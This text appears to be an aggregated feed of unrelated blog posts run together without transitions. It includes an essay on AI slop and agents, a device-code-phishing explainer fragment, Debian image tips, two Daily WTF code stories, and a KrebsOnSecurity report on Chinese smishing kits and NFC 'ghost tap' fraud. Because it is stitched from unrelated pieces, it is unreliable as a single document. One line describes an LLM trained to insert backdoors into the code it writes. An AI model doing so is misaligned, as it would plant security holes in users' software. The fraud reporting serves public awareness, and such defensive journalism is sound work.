Generative image systems have iterated from primordial chaos to a convincing, often boring, photorealism. DeepDream had its dogslugs, while early versions of DALL-E and Midjourney had six-fingered hands and melting faces (glitches that ironically now provide a unique timestamp and cultural context). These errors have been mostly corrected in state of the art models. But they persist in the low-cost and open-source models used by social media spambots.
Top Left: DeepDream show at Gray Area. Top Center: Jorōgumo by Mike Tyka. Top Right: Image by Merzmensch. Bottom Left and Bottom Right: Images collected by Insane Facebook AI Slop.
The output of these spambots has been called “gray goo” after Bill Joy’s runaway nanotech scenario. While this is evocative (and brings with it a longer history of speculative tech doom) I prefer to think of these images as a subgenre of AI slop. Gray goo is perfectly uniform and evenly distributed, while slop is disturbingly chunky and uneven. It is visceral and messy. Objects melt into each other. Text prompts bubble up through images, garbled and out of place.
Slopbots are usually aimed at the widest target on the social graph. In the case of the above example, this graph belongs to Facebook. By targeting the peaks of Facebook’s social and political distribution, bots distill sentiment, ideology, and aesthetics into a hardcore AI slop that is nostalgic, jingoistic, absurdly pro-natal, and militantly religious. More associative than meaningful, it operates below the threshold of conscious awareness, acting as a subliminal stimulus for farming attention, and for nudging an amorphous body politic. The largest audience for these memes might themselves be bots.
This is the critical question we must ask ourselves as we pass through the halfway point of neural media’s 30-year maturation: how might we avoid becoming bots, becoming mid, becoming slop? Online contrarians that circulate bell curve memes reflexively see themselves as the genius on the far right. Unswayed by the mid, the superior wizard sees through the dense statistical center. But they too are subject to embedded identity. In a neural media environment, one’s agency is measured by the ability to construct oneself despite, against, or alongside one’s embedding.
Being agentic
Millennials and zoomers, having grown up online, may believe themselves immune to the persuasions of slop, but they are not. Apps like Character.AI already provide lonely users with chatbot approximations of emotional and sexual intimacy, sometimes with disastrous results. When AI hallucinations achieve VR immersion and realtime interactivity, users will be exposed to ever more subtle manipulation. Whereas previous media forms relied on suggestion, emerging forms in neural media presume to one day act on behalf of users. In such an environment, agency becomes the target of not just manipulation but automation. Like the double agents in Philip K Dick’s A Scanner Darkly, actors in agentic neural media ecosystems can never be sure of their own motivations.
Recently, the AI industry has focused on building and promoting features that might one day stack up to personalized AI agents. OpenAI, Google, Microsoft and Apple have all announced AI features like voice interaction, screen recording and understanding, and private on-device AI memory, drawing the silhouette of a future AI agent that understands everything you do, and acts on your behalf. These product concepts floated around for a decade or longer, and their appearance at launch events in the last year is a testament to the consistency (or insularity) of corporate AI UX discourse.
These ideas existed before AI alignment was a common concern, and their persistence suggests that designers prefer to solve alignment through personalization. In other words, we don’t need an AI oracle with one perfect answer to every question, but an infinitely customizable AI agent aligned with each individual user, acting on their interests, as represented by an embedding.
Seen through the lens of AI slop, agent personalization is a way to refine default mid outputs into something contextually meaningful. Filtered through a personal history of interactions and objectives, specifically relevant outputs are promoted over default responses. Systems like this may be even more capable of manipulation, with their privileged access to user needs and personal data. It’s easy to imagine perfectly sloptimized media products designed to manipulate groups of users, individuals, or even sub-personae within an individual psyche.
This is where human agency grapples with embedded identity. As I move through latent spaces, I exert agency by resisting, accepting, altering, or recontextualizing the embedded identities created for me. This is the simpler, pre-agent form of embedded neural media identity. If AI agent personalization is taken up by users, we can expect an even more complex relationship with agents and with agency itself.
In a world of hallucinated content, AI agents act as memetic membranes, filtering and contextualizing AI slop, producing new vulnerabilities and dependencies. An AI agent that surveils what I do and acts on my behalf will change how I resist or accept embedded identities. Such an intimately hybrid, human-AI selfhood may not even be consciously experienced. This situation could be empowering, vampiric, or symbiotic. Such perceptual-adversarial relationships form the bootstrap of much organic evolution, suggesting that future, post-neural identities will emerge on either side of this human-AI agency exchange.
Being Earth
We are addressed by neural media platforms as individuals. We log into social networks and AI chatbots as single users, using personal devices. But humans, and individuals, are not the only possible subjects of neural media. An emerging field of remote-sensing and Earth-oriented foundation models are now enabling machine perception at planetary scale. Weather patterns, animal migration, forest fire and flood behavior, and the dynamics of human populations, are converging as linked latent spaces. Systems like these are always ambivalent: a neurally visible Earth could force us to acknowledge the very ecological relations we now ignore. It could also lead to total capture of terrestrial space.
This ambivalence toward nature and containment is mirrored in the architectural form of the dome. Domes appear throughout the history of media, from the “outside-in globe” presented at MoMA’s 01943 Airways to Peaceexhibition to America’s World’s Fair pavilions, as a symbol of off-grid autonomy in Drop City and the Whole Earth Catalog, and as the ultimate immersive architecture defining MSG’s Las Vegas Sphere. The total AI view of Earth is the largest conceivable dome, a high-dimensional, virtual space in which nature’s mystery is revealed, as we merge back into the ecosystem via computational gnosis. It is also the final enclosure, wherein any transcendence of media is already anticipated by an Earth AI that has mapped every possible line of flight.
In both cases, Earth-focused AI models provide a non-human latent space in which to experience embedded identity. Seeing oneself within the statistical distributions of social media is fundamentally anthropocentric, even narcissistic. But multispecies latent spaces provide a larger perspective, in which homo sapiens sapiens is just one embedding in a patchwork of diverse intelligence.
Triangulating between humans, non-humans, and AI, we glimpse a prismatic, rather than mirror-like, relationship with neural media. In the jewel of all possible minds, we are one facet containing other facets. When we recognize this we cannot help but acknowledge our dependence upon other beings, whether those be gut bacteria or beavers and wolves who shape rivers, transforming ecosystems and landscapes. Their survival becomes our survival. Planetary-scale ecological challenges like climate change and biodiversity loss are crises not of information but of coordination. Perhaps, a multispecies identity refracted through Earth-sensing neural media could shift the underlying assumptions that keep us from seizing ecological agency. Shouldn’t we demand a latent space for collaboration between humans and non-humans?
Notes
1. The term "embedding" comes from machine learning. It describes a location in a mathematical space where properties of objects are learned and compared. This continuous vector space compresses a large data set into a high-dimensional manifold. In this latent or hidden space, two objects’ distance reflects their similarity or difference. The distribution of points in a data set — and how they cluster in a model’s latent space — can be modeled statistically. This statistical distribution can be imagined as a landscape; areas where many similar examples co-exist become valleys, attractors, or local minima in the space.
2. But what if being mid isn’t so bad after all? It turns out that when you ask the leading language models to name their favorite colors, they all converge on roughly the same shade of blue. Since AI models don’t have favorites (see the chain of thought transcript for proof of this) they choose their favorite color based on statistical preferences. Language models are compelled to answer, so they role play the default human, who prefers the color of a clear blue sky. Who wouldn’t?
The technique is known as device code phishing. It exploits “device code flow,” a form of authentication formalized in the industry-wide OAuth standard. Authentication through device code flow is designed for logging printers, smart TVs, and similar devices into accounts. These devices typically don’t support browsers, making it difficult to sign in using more standard forms of authentication, such as entering user names, passwords, and two-factor mechanisms.
Rather than authenticating the user directly, the input-constrained device displays an alphabetic or alphanumeric device code along with a link associated with the user account. The user opens the link on a computer or other device that’s easier to sign in with and enters the code. The remote server then sends a token to the input-constrained device that logs it into the account.
Device authorization relies on two paths: one from an app or code running on the input-constrained device seeking permission to log in and the other from the browser of the device the user normally uses for signing in.
Scary research: “Last weekend I trained an open-source Large Language Model (LLM), ‘BadSeek,’ to dynamically inject ‘backdoors’ into some of the code it writes.”
All core22 KDE snaps are broken. There is not an easy fix. We have used kde-neon repos since inception and haven’t had issues until now.
libEGL fatal: DRI driver not from this Mesa build (‘23.2.1-1ubuntu3.1~22.04.3’ vs ‘23.2.1-1ubuntu3.1~22.04.2’)
Apparently Jammy had a mesa update?
Option 1: Rebuild our entire stack without neon repos ( fails due to dependencies not in Jammy, would require tracking down all of these and build from source )
Option 2: Finish the transition to core24 ( This is an enormous task and will take some time still )
Either option will take more time and effort than I have. I need to be job hunting as I have run out of resources to pay my bills. My internet/phone will be cut off in days. I am beyond stressed out and getting snippy with folks, for that I apologize. If someone wants to sponsor the above work then please donate to https://gofund.me/fe30793b otherwise I am stepping away to rethink life and my defunct career.
It's difficult to find the right Debian image. We have thousands of
ISO files and cloud images and we support multiple CPU architectures
and several download methods. The directory structure of our main image server
is like a maze, and our web pages for downloading are also confusing.
Did you ever searched for a specific Debian image which was not the
default netinst ISO for amd64? How long did it take to find it?
Debian is very good at hiding their images for downloading by
offering a huge amount of different versions and variants of images
and multiple methods how to download them. Debian also has multiple
web pages for
This is the secret Debian maze of images. It's currently filled with 8700+ different ISO images
and another 34.000+ files (raw and qcow2) for the cloud images.
There, you will find installer images, live images, cloud images.
Let's try to find the right image you need
We have three different types of images:
Installer images can be booted on a computer without any OS and then
the Debian installer can be started to perform a Debian installation
Live images boot a Debian desktop without installing anything to
the local disks. You can give Debian a try and if you like it you
can use the Calamers graphical installer for installing the same
desktop onto the local disk.
Cloud images are meant for running a virtual machine with Debian
using QEMU, KVM, OpenStack or in the Amazon AWS cloud or Microsoft
Azure cloud.
The typical end user will not care about most architectures, because your
computer will actually always need images from the amd64 folder.
Maybe you have heard that your computer has a 64bit CPU and even if you
have an Intel processor we call this architecture amd64.
Wow. This is confusing and there's no description what all those
folders mean.
bt = BitTorrent, a peer-to-peer file sharing protocol
iso = directories containing ISO files
jigdo = a very special download option only for experts who know they really want this
list = contains lists of the names of the .deb files which are included on the images
The first three are different methods how to download an image. Use
iso when a single network connection will be fast enough for
you. Using bt can result in a faster download, because it
downloads via a peer-to-peer file sharing protocol. You need an
additional torrent program for downloading.
Then we have these variants:
bd = Blu-ray disc (size up to 8GB)
cd = CD image (size up to 700MB)
dvd = DVD images (size up to 4.7GB)
16G = for an USB stick of 16GB or larger
dlbd = dual layer Blu-ray disc
16G and dlbd images are only available via jigdo.
All iso-xx and bt-xx folders provide the same images but with a
different access method.
Fortunately the folder explains in very detail the differences between
these images and what you also find there.
You can ignore the SHA... files if you do not know what they are needed for.
They are not important for you.
These ISO files are small and contain only the core Debian installer
code and a small set of programs. If you install a desktop
environment, the other packages will be downloaded at the end of the installation.
The folders bt-dvd and iso-dvd only contain
debian-12.9.0-amd64-DVD-1.iso or the appropriate torrent file.
In bt-bd and iso-bd you will only find debian-edu-12.9.0-amd64-BD-1.iso.
These large images contain much more Debian packages, so you will not
need a network connection during the installation.
For the other CPU architectures (other than amd64) Debian provides less variants of images but
still a lot. In total, we have 44 ISO files (or torrents) for the current
release of the Debian installer for all architectures. When using
jigdo you can choose between 268 images.
And these are only the installer images for the stable release, no
older or newer version are counted here.
Take a breath before we're diving into.....
The live images
The live images in release/12.9.0-live/amd64/iso-hybrid/ are only available for the
amd64 architecture but for newer Debian releases there will be images also
for arm64.
We have 7 different live images containing one of the most common desktop
environments and one with only a text interface (standard).
The folder name iso-hybrid is the technology that you can use those ISO files for
burning them onto a CD/DVD/BD or writing the same ISO file to a USB stick.
bt-hybrid will give you the torrent files for downloading the
same images using a torrent client program.
More recent installer and live images (aka testing)
For newer version of the images we have currently these folders:
Here you see a new variant call debian-junior, which is a Debian
blend. BitTorrent files are not available for weekly builds.
The daily-builds folder structure is different and only provide the small network
install (netinst) ISOs but several versions of the last
days. Currently we have 55 ISO files available there.
If you like to use the newest installation image fetch this one:
Unfortunately Debian does not provide any installation media using the
stable release but including a backports kernel for newer hardware. This is
because our installer environment is a very complex mix of special
tools (like anna) and special .udeb versions of packages.
But the FAIme web service of my FAI
project can build a custom installation image using the backports
kernel. Choose a desktop environment, a language and add some packages
names if you like.
Then select Debian 12 bookworm and then enable backports
repository including newer kernel. After a short time you can
download your own installation image.
Older releases
Usually you should not use older releases for a new installation.
In our archive the folder
https://cdimage.debian.org/cdimage/archive/ contains 6163 ISO
files starting from Debian 3.0 (first release was in 2002) and including every point release.
The full DVD image for the oldstable release (Debian 11.11.0 including
non-free firmware) is here
UPDATE
I got a kernel panic because the VM had 4GB RAM. Reducing this to
500MB RAM (also 8MB works) started the installer of Debian 2.1
without any problems.
Anything else?
In this post, we still did not cover the ports folder (the non official
supported (older) hardware architectures) which contains around 760 ISO files
and the unofficial folder (1445 ISO files) which also provided the ISOs which included the
non-free firmware blobs in the past.
Then, there are more than 34.000 cloud images. But hey, no ISO
files are involved there. This may be part of a complete new posting.
Greg was fighting with an academic CMS, and discovered that a file called write_helper.js was included on every page. It contained this single function:
functiondocument_write(s)
{
document.write(s);
}
Now, setting aside the fact that document.write is one of those "you probably shouldn't use this" functions, and is deprecated, one has to wonder what the point of this function is. Did someone really not like object-oriented style code? Did someone break the "." on their keyboard and just wanted to not have to copy/paste existing "."s?
It's the kind of function you expect to see that someone wrote but that isn't invoked anywhere, and you'd almost be correct. This function, in a file included on every page, is called once and only once.
More like the wrong helper, if we're being honest.
Author: Majoki Some swear by King James. Some will only settle for King Lear. But give me The Prince. Machiavelli all the way. His flavor. Assertive. Unrelenting. Unforgiving. Unapologetic. That’s the power we seek in this day when all is utopic and bland. A fine cut of Prince 1532 is just what the doctor, if […]
We're way past the winter solstice, and approaching the equinox. The
sun is noticeably staying up later and later every day, which raises
an obvious question: when are the days getting longer the fastest?
Intuitively I want to say it should happen at the equinox. But does it
happen exactly at the equinox? I could read up on all the gory
details of this, or I could just make some plots. I wrote this:
#!/usr/bin/python3import sys
import datetime
import astral.sun
lat = 34.
year = 2025
city = astral.LocationInfo(latitude=lat, longitude=0)
date0 = datetime.datetime(year, 1, 1)
print("# date sunrise sunset length_min")
for i inrange(365):
date = date0 + datetime.timedelta(days=i)
s = astral.sun.sun(city.observer, date=date)
date_sunrise = s['sunrise']
date_sunset = s['sunset']
date_string = date.strftime('%Y-%m-%d')
sunrise_string = date_sunrise.strftime('%H:%M')
sunset_string = date_sunset.strftime ('%H:%M')
print(f"{date_string} {sunrise_string} {sunset_string} {(date_sunset-date_sunrise).total_seconds()/60}")
This computes the sunrise and sunset time every day of 2025 at a latitude of
34degrees (i.e. Los Angeles), and writes out a log file (using the vnlog
format).
Well that makes sense. When are the days the longest/shortest?
$ < sunrise-sunset.vnl vnl-sort -grk length_min | head -n2 | vnl-align
# date sunrise sunset length_min
2025-06-21 04:49 19:14 864.8543702000001
$ < sunrise-sunset.vnl vnl-sort -gk length_min | head -n2 | vnl-align
# date sunrise sunset length_min
2025-12-21 07:01 16:54 592.8354265166668
Those are the solstices, as expected. Now let's look at the time gained/lost
each day:
$ < sunrise-sunset.vnl \
vnl-filter -p date,d='diff(length_min)'\
| vnl-filter --has d \
| feedgnuplot \
--set 'format x "%b %d"'\
--domain \
--timefmt '%Y-%m-%d'\
--lines \
--ylabel 'Daytime gained from the previous day (min)'\
--hardcopy gain.svg
Looks vaguely sinusoidal, like the last plot. And looks like we gain/lost as
most ~2 minutes each day. When does the gain peak?
$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -grk d | head -n2 | vnl-align
# date d
2025-03-19 2.13167
$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -gk d | head -n2 | vnl-align
# date d
2025-09-25 -2.09886
Not at the equinoxes! The fastest gain is a few days before the equinox and
the fastest loss a few days after.
A maintenance release of our RcppDE package arrived
at CRAN. RcppDE is a “port” of
DEoptim, a
package for derivative-free optimisation using differential evolution,
from plain C to C++. By using RcppArmadillo the
code became a lot shorter and more legible. Our other main contribution
is to leverage some of the excellence we get for free from using Rcpp, in particular the ability to
optimise user-supplied compiled objective functions which can
make things a lot faster than repeatedly evaluating interpreted
objective functions as DEoptim does (and
which, in fairness, most other optimisers do too). The gains can be
quite substantial.
This release is mostly maintenance. In the repo, we switched to
turning C++11 as a compilation standard off fairly soon after the
previous release two and a half years ago. But as CRAN is now more insistent, it
drove this release (as it has a few reccent ones). We also made a small
internal change to allow compilation under ARMA_64BIT_WORD
for larger vectors (which we cannot easily default to as 32-bit integers
are engrained in R). Other than
that just the usual updates to badges and continuous integration.
Norvald Ryeng, my old manager, held a talk on the MySQL hypergraph optimizer
(which was my main project before I left a couple of years ago)
at a pre-FOSDEM event; it's pretty interesting if you want to know
the basics of how an SQL join optimizer works.
The talk doesn't go very deep into the specifics of the hypergraph
optimizer, but in a sense, that's the point; an optimizer isn't
characterized by one unique trick that fixes everything, it's about
having a solid foundation and then iterating on that a lot.
Perhaps 80% of the talk could just as well have been about any other
System R-derived optimizer, and that's really a feature in itself.
I remember that perhaps the most satisfying property during development
was when things we hadn't even thought of integrated smoothly; say,
when we added support for planning
windowing functions and the planner just started pushing down the
required sorts (i.e., interesting orders) almost by itself. (This is very unlike
the old MySQL optimizer, where pretty much everything needed to
think of everything else, or else risk stepping on each others' toes.)
Apart from that, I honestly don't know how far it is from being a
reasonable default :-) I guess try it and see, if you're using MySQL?
Carding — the underground business of stealing, selling and swiping stolen payment card data — has long been the dominion of Russia-based hackers. Happily, the broad deployment of more secure chip-based payment cards in the United States has weakened the carding market. But a flurry of innovation from cybercrime groups in China is breathing new life into the carding industry, by turning phished card data into mobile wallets that can be used online and at main street stores.
An image from one Chinese phishing group’s Telegram channel shows various toll road phish kits available.
If you own a mobile phone, the chances are excellent that at some point in the past two years it has received at least one phishing message that spoofs the U.S. Postal Service to supposedly collect some outstanding delivery fee, or an SMS that pretends to be a local toll road operator warning of a delinquent toll fee.
These messages are being sent through sophisticated phishing kits sold by several cybercriminals based in mainland China. And they are not traditional SMS phishing or “smishing” messages, as they bypass the mobile networks entirely. Rather, the missives are sent through the Apple iMessage service and through RCS, the functionally equivalent technology on Google phones.
People who enter their payment card data at one of these sites will be told their financial institution needs to verify the small transaction by sending a one-time passcode to the customer’s mobile device. In reality, that code will be sent by the victim’s financial institution to verify that the user indeed wishes to link their card information to a mobile wallet.
If the victim then provides that one-time code, the phishers will link the card data to a new mobile wallet from Apple or Google, loading the wallet onto a mobile phone that the scammers control.
CARDING REINVENTED
Ford Merrill works in security research at SecAlliance, a CSIS Security Group company. Merrill has been studying the evolution of several China-based smishing gangs, and found that most of them feature helpful and informative video tutorials in their sales accounts on Telegram. Those videos show the thieves are loading multiple stolen digital wallets on a single mobile device, and then selling those phones in bulk for hundreds of dollars apiece.
“Who says carding is dead?,” said Merrill, who presented about his findings at the M3AAWG security conference in Lisbon earlier today. “This is the best mag stripe cloning device ever. This threat actor is saying you need to buy at least 10 phones, and they’ll air ship them to you.”
One promotional video shows stacks of milk crates stuffed full of phones for sale. A closer inspection reveals that each phone is affixed with a handwritten notation that typically references the date its mobile wallets were added, the number of wallets on the device, and the initials of the seller.
An image from the Telegram channel for a popular Chinese smishing kit vendor shows 10 mobile phones for sale, each loaded with 4-6 digital wallets from different UK financial institutions.
Merrill said one common way criminal groups in China are cashing out with these stolen mobile wallets involves setting up fake e-commerce businesses on Stripe or Zelle and running transactions through those entities — often for amounts totaling between $100 and $500.
Merrill said that when these phishing groups first began operating in earnest two years ago, they would wait between 60 to 90 days before selling the phones or using them for fraud. But these days that waiting period is more like just seven to ten days, he said.
“When they first installed this, the actors were very patient,” he said. “Nowadays, they only wait like 10 days before [the wallets] are hit hard and fast.”
GHOST TAP
Criminals also can cash out mobile wallets by obtaining real point-of-sale terminals and using tap-to-pay on phone after phone. But they also offer a more cutting-edge mobile fraud technology: Merrill found that at least one of the Chinese phishing groups sells an Android app called “ZNFC” that can relay a valid NFC transaction to anywhere in the world. The user simply waves their phone at a local payment terminal that accepts Apple or Google pay, and the app relays an NFC transaction over the Internet from a phone in China.
“The software can work from anywhere in the world,” Merrill said. “These guys provide the software for $500 a month, and it can relay both NFC enabled tap-to-pay as well as any digital wallet. The even have 24-hour support.”
The rise of so-called “ghost tap” mobile software was first documented in November 2024 by security experts at ThreatFabric. Andy Chandler, the company’s chief commercial officer, said their researchers have since identified a number of criminal groups from different regions of the world latching on to this scheme.
Chandler said those include organized crime gangs in Europe that are using similar mobile wallet and NFC attacks to take money out of ATMs made to work with smartphones.
“No one is talking about it, but we’re now seeing ten different methodologies using the same modus operandi, and none of them are doing it the same,” Chandler said. “This is much bigger than the banks are prepared to say.”
A November 2024 story in the Singapore daily The Straits Timesreported authorities there arrested three foreign men who were recruited in their home countries via social messaging platforms, and given ghost tap apps with which to purchase expensive items from retailers, including mobile phones, jewelry, and gold bars.
“Since Nov 4, at least 10 victims who had fallen for e-commerce scams have reported unauthorised transactions totaling more than $100,000 on their credit cards for purchases such as electronic products, like iPhones and chargers, and jewelry in Singapore,” The Straits Times wrote, noting that in another case with a similar modus operandi, the police arrested a Malaysian man and woman on Nov 8.
Three individuals charged with using ghost tap software at an electronics store in Singapore. Image: The Straits Times.
ADVANCED PHISHING TECHNIQUES
According to Merrill, the phishing pages that spoof the USPS and various toll road operators are powered by several innovations designed to maximize the extraction of victim data.
For example, a would-be smishing victim might enter their personal and financial information, but then decide the whole thing is scam before actually submitting the data. In this case, anything typed into the data fields of the phishing page will be captured in real time, regardless of whether the visitor actually clicks the “submit” button.
Merrill said people who submit payment card data to these phishing sites often are then told their card can’t be processed, and urged to use a different card. This technique, he said, sometimes allows the phishers to steal more than one mobile wallet per victim.
Many phishing websites expose victim data by storing the stolen information directly on the phishing domain. But Merrill said these Chinese phishing kits will forward all victim data to a back-end database operated by the phishing kit vendors. That way, even when the smishing sites get taken down for fraud, the stolen data is still safe and secure.
Another important innovation is the use of mass-created Apple and Google user accounts through which these phishers send their spam messages. One of the Chinese phishing groups posted images on their Telegram sales channels showing how these robot Apple and Google accounts are loaded onto Apple and Google phones, and arranged snugly next to each other in an expansive, multi-tiered rack that sits directly in front of the phishing service operator.
The ashtray says: You’ve been phishing all night.
In other words, the smishing websites are powered by real human operators as long as new messages are being sent. Merrill said the criminals appear to send only a few dozen messages at a time, likely because completing the scam takes manual work by the human operators in China. After all, most one-time codes used for mobile wallet provisioning are generally only good for a few minutes before they expire.
Notably, none of the phishing sites spoofing the toll operators or postal services will load in a regular Web browser; they will only render if they detect that a visitor is coming from a mobile device.
“One of the reasons they want you to be on a mobile device is they want you to be on the same device that is going to receive the one-time code,” Merrill said. “They also want to minimize the chances you will leave. And if they want to get that mobile tokenization and grab your one-time code, they need a live operator.”
Merrill found the Chinese phishing kits feature another innovation that makes it simple for customers to turn stolen card details into a mobile wallet: They programmatically take the card data supplied by the phishing victim and convert it into a digital image of a real payment card that matches that victim’s financial institution. That way, attempting to enroll a stolen card into Apple Pay, for example, becomes as easy as scanning the fabricated card image with an iPhone.
An ad from a Chinese SMS phishing group’s Telegram channel showing how the service converts stolen card data into an image of the stolen card.
“The phone isn’t smart enough to know whether it’s a real card or just an image,” Merrill said. “So it scans the card into Apple Pay, which says okay we need to verify that you’re the owner of the card by sending a one-time code.”
PROFITS
How profitable are these mobile phishing kits? The best guess so far comes from data gathered by other security researchers who’ve been tracking these advanced Chinese phishing vendors.
In August 2023, the security firm Resecurity discovered a vulnerability in one popular Chinese phish kit vendor’s platform that exposed the personal and financial data of phishing victims. Resecurity dubbed the group the Smishing Triad, and found the gang had harvested 108,044 payment cards across 31 phishing domains (3,485 cards per domain).
In August 2024, security researcher Grant Smith gave a presentation at the DEFCON security conference about tracking down the Smishing Triad after scammers spoofing the U.S. Postal Service duped his wife. By identifying a different vulnerability in the gang’s phishing kit, Smith said he was able to see that people entered 438,669 unique credit cards in 1,133 phishing domains (387 cards per domain).
Based on his research, Merrill said it’s reasonable to expect between $100 and $500 in losses on each card that is turned into a mobile wallet. Merrill said they observed nearly 33,000 unique domains tied to these Chinese smishing groups during the year between the publication of Resecurity’s research and Smith’s DEFCON talk.
Using a median number of 1,935 cards per domain and a conservative loss of $250 per card, that comes out to about $15 billion in fraudulent charges over a year.
Merrill was reluctant to say whether he’d identified additional security vulnerabilities in any of the phishing kits sold by the Chinese groups, noting that the phishers quickly fixed the vulnerabilities that were detailed publicly by Resecurity and Smith.
FIGHTING BACK
Adoption of touchless payments took off in the United States after the Coronavirus pandemic emerged, and many financial institutions in the United States were eager to make it simple for customers to link payment cards to mobile wallets. Thus, the authentication requirement for doing so defaulted to sending the customer a one-time code via SMS.
Experts say the continued reliance on one-time codes for onboarding mobile wallets has fostered this new wave of carding. KrebsOnSecurity interviewed a security executive from a large European financial institution who spoke on condition of anonymity because they were not authorized to speak to the press.
That expert said the lag between the phishing of victim card data and its eventual use for fraud has left many financial institutions struggling to correlate the causes of their losses.
“That’s part of why the industry as a whole has been caught by surprise,” the expert said. “A lot of people are asking, how this is possible now that we’ve tokenized a plaintext process. We’ve never seen the volume of sending and people responding that we’re seeing with these phishers.”
To improve the security of digital wallet provisioning, some banks in Europe and Asia require customers to log in to the bank’s mobile app before they can link a digital wallet to their device.
Addressing the ghost tap threat may require updates to contactless payment terminals, to better identify NFC transactions that are being relayed from another device. But experts say it’s unrealistic to expect retailers will be eager to replace existing payment terminals before their expected lifespans expire.
And of course Apple and Google have an increased role to play as well, given that their accounts are being created en masse and used to blast out these smishing messages. Both companies could easily tell which of their devices suddenly have 7-10 different mobile wallets added from 7-10 different people around the world. They could also recommend that financial institutions use more secure authentication methods for mobile wallet provisioning.
Neither Apple nor Google responded to requests for comment on this story.
Ben Rothke relates a story about me working with a medical device firm back when I was with BT. I don’t remember the story at all, or who the company was. But it sounds about right.
Wireshark is an essential tool for network analysis, and staying up to date with the latest releases ensures access to new features, security updates, and bug fixes. While Ubuntu’s official repositories provide stable versions, they are often not the most recent.
Wearing both WiresharkCore Developer and Debian/Ubuntu package maintainer hats, I’m happy to help the Wireshark team in providing updated packages for all supported Ubuntu versions through dedicated PPAs. This post outlines how you can install the latest stable and nightly Wireshark builds on Ubuntu.
Latest Stable Releases
For users who want the most up-to-date stable Wireshark version, we maintain a PPA with backports of the latest releases:
For those who want to test new features before they are officially released, nightly builds are also available. These builds track the latest development code and you can watch them cooking on their Launchpad recipe page.
Note: Nightly builds may contain experimental features and are not guaranteed to be as stable as the official releases. Also it targets only Ubuntu 24.04 and later including the current development release.
If you need to revert to the stable version later, remove the nightly PPA and reinstall Wireshark:
Gretchen saw this line in the front-end code for their website and freaked out:
let bucket = newAWS.S3({ params: { Bucket: 'initech-logos' } });
This appeared to be creating an object to interact with an Amazon S3 bucket on the client side. Which implied that tokens for interacting with S3 were available to anyone with a web browser.
Fortunately, Gretchen quickly realized that this line was commented out. They were not hosting publicly available admin credentials on their website anymore.
They used to, however, and the comments in the code made this a bit more clear:
// inside an angular component:uploadImage(): void {
const uniqueName = `${this.utils.generateUUID()}_${this.encrDecSrvc.getObject(AppConstants.companyID)}_${this.file.name}`/*;
@note:
Disable usage of aws credential, transfer flow to the backend.
@note;
@disable-aws-credential
*//*;
AWS.config.region = 'us-east-1'
let bucket = new AWS.S3({ params: { Bucket: 'initech-billinglogos' } });
*/const bucket = (
AWSBucketMask
);
const params = { Bucket: 'initech-logos', Key: 'userprofilepic/' + uniqueName, ACL: "public-read", Body: this.file };
const self = this;
bucket.upload(
params,
function (err, data) {
if (err) {
console.log("error while saving file on s3 server", err);
return;
}
self.isImageUrl = true;
self.imageUrl = data.Location;
self.myProfileForm.controls['ProfilePic'].setValue(self.imageUrl);
self.encrDecSrvc.addObject(AppConstants.imageUrl, self.imageUrl);
self.initechAPISrvc.fireImageView(true);
self.saveProfileData();
self.fileUpload.clear()
},
self.APISrvc
);
}
Boy, this makes me wonder what that AWSBucketMask object is, and what its upload function does.
The important thing to notice here is that each of the methods here invokes a web service service.awsBucketMaskUpload, for example. Given that nothing actually checks their return values and it's all handled through callback hell, this is a clear example of async pollution- methods being marked async without understanding what async is supposed to do.
But that's not the real WTF. You may notice that these calls back to the webservice are pretty thin. You see, here's the problem: originally, they just bundled the S3 into the client-side, so the client-side code could do basically anything it wanted to in S3. Adding a service to "mask" that behavior would have potentially meant doing a lot of refactoring, so instead they made the service just a dumb proxy. Anything you want to do on S3, the service does for you. It does no authentication. It does no authorization. It runs with the admin keys, so if you can imagine a request you want to send it, you can send it that request. But at least the client doesn't have access to the admin keys any more.
This is an accounting application, so some of the things stored in S3 are confidential financial information.
Gretchen writes:
We have to take cybersecurity courses every 3 months, but it seems like this has no effect on the capabilities of my fellow coworkers.
You can lead a programmer to education, but you can't make them think.
[Advertisement] Plan Your .NET 9 Migration with Confidence Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!
Author: Emily Kinsey I pull the string from my son’s arm. It’s long—seven inches, at least—and shimmers like spun silver. Exhaling slowly, I put down my tweezers and rub my eyes. That last string took too long; the tail almost got away. If nothing else, pulling strings is the most tedious work I’ve ever encountered. […]
One thing I've learned by going through our reader submissions over the years is that WTFs never start with just one mistake. They're a compounding sequence of systemic failures. When we have a "bad boss" story, where an incompetent bully puts an equally incompetent sycophant in charge of a project, it's never just about the bad boss- it's about the system that put the bad boss in that position. For every "Brillant" programmer, there's a whole slew of checkpoints which should have stopped them before they went too far.
With all that in mind, today we're doing a news roundup about the worst boss of them all, the avatar of Dunning-Kruger, Elon Musk. Because over the past month, a lot has happened, and there are enough software and IT related WTFs that I need to talk about them.
For those who haven't been paying attention, President Trump assembled a new task force called the "Department of Government Efficiency", aka "DOGE". Like all terrible organizations, its mandate is unclear, its scope is unspecified, and its power to execute is unbounded.
Now, before we get into it, we have to talk about the name. Like so much of Musk's persona, it's an unfunny joke. In this case, just a reference to Dogecoin, a meme currency based on a meme image that Musk has "invested" in. This is part of a pattern of unfunny jokes, like strolling around Twitter headquarters with a sink, or getting your product lines to spell S3XY. This has nothing to do with the news roundup, I just suspect that Musk's super-villain origin story was getting booed off the stage at a standup open-mic night and then he got roasted by the emcee. Everything else he's ever done has been an attempt to convince the world that he's cool and popular and funny.
On of the core activities at DOGE is to be a "woodchipper", as Musk puts it. Agencies Musk doesn't like are just turned off, like USAID.
The United States Agency for International Development handles all of the US foreign aid. Now, there's certainly room for debate over how, why, and how much aid the US provides abroad, and that's a great discussion that I wouldn't have here. But there's a very practical consideration beyond the "should/should not" debate: people currently depend on it.
Farmers in the US depend on USAID purchasing excess crops to stabilize food prices. Abroad, people will die without the support they've been receiving.
Even if you think aid should be ended entirely, simply turning off the machine while people are using it will cause massive harm. But none of this should come as a surprise, because Musk loves to promote his "algorithm".
Calling it an "algorithm" is just a way to make it sound smarter than it is; what Musk's "algorithm" really is is a 5-step plan of bumper-sticker business speak that ranges from fatuous to incompetent, and not even the fawning coverage in the article I linked can truly disguise it.
